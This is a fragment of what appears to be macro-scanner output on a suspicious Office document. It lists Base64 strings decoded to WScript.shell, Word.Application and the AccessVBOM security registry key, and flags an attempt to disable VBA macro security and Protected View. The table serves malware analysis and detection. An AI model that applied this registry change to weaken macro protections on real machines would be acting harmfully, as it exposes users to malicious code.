|          |                    |command (obfuscation: Base64)                |
|Suspicious|AccessVBOM          |May attempt to disable VBA macro security and|
|          |                    |Protected View (obfuscation: Base64)         |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Base64    |WScript.shell       |V1NjcmlwdC5zaGVsbA==                         |
|String    |                    |                                             |
|Base64    |HKEY_CURRENT_USER\So|SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb|
|String    |ftware\Microsoft\Off|2Z0XE9mZmljZVw=                              |
|          |ice\                |                                             |
|Base64    |\Word\Security\Acces|XFdvcmRcU2VjdXJpdHlcQWNjZXNzVkJPTQ==         |
|String    |sVBOM               |                                             |
|Base64    |REG_DWORD           |UkVHX0RXT1JE                                 |
|String    |                    |                                             |
|Base64    |.main               |Lm1haW4=                                     |
|String    |                    |                                             |
|Base64    |s                   |cw0KRW5kIFN1Yg0KDQo=                         |
|String    |End Sub             |                                             |
|Base64    |Word.Application    |V29yZC5BcHBsaWNhdGlvbg==                     |
|String    |                    |                                             |
+----------+--------------------+---------------------------------------------+

